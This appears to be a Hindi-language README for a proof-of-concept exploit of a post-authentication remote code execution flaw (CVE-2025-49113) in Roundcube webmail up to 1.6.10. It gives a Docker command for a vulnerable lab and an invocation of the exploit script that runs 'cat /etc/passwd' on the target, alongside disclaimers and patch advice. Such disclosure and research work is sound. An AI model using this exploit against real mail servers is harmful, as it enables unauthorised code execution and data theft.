
Roundcube (संस्करण ≤ 1.6.10) में एक गंभीर प्रमाणीकरण-पश्चात रिमोट कोड निष्पादन (RCE) भेद्यता की खोज की गई, जो असुरक्षित PHP ऑब्जेक्ट डिसीरियलाइज़ेशन के कारण होती है। यह गंभीर दोष 10 वर्षों से अधिक समय से चुपचाप कोडबेस में मौजूद है।
पूर्ण तकनीकी राइटअप और शोषण विवरण के लिए, देखें:
👉 https://fearsoff.org/research/roundcube
यह एक Docker कंटेनर के अंदर Ubuntu 24.04, Roundcube और सभी आवश्यक निर्भरताएँ स्थापित करेगा:
docker run --name ubuntu24 \
-p 9876:80 \
-v "$PWD/rc_install.sh":/root/rc_install.sh \
-it ubuntu:24.04 \
bash -c "chmod +x /root/rc_install.sh && /root/rc_install.sh && exec bash"
⚠️ नोट: केवल पृथक वातावरण में उपयोग करें। कमजोर इंस्टेंस को सार्वजनिक इंटरनेट पर नहीं उजागर करें।
यह प्रूफ-ऑफ-कॉन्सेप्ट कोड केवल शैक्षिक और शोध उद्देश्यों के लिए प्रदान किया गया है। लेखक और योगदानकर्ता इस कोड के उपयोग से होने वाले किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं हैं। उन सिस्टमों पर अनधिकृत उपयोग जिनके आप स्वामी नहीं हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट अनुमति नहीं है, अवैध है और सख्त वर्जित है।
सुनिश्चित करें कि सिस्टम पर php स्थापित है
php CVE-2025-49113.php http://127.0.0.1:9876/ roundcube fearsoff.org "cat /etc/passwd > /tmp/pwned"
यदि आप Roundcube ≤ 1.6.10 चला रहे हैं, तो इस भेद्यता को समाप्त करने के लिए तुरंत नवीनतम पैच किए गए संस्करण में अपडेट करें।
यह प्रोजेक्ट और संबद्ध दस्तावेज़ MIT लाइसेंस के अंतर्गत प्रदान किए गए हैं।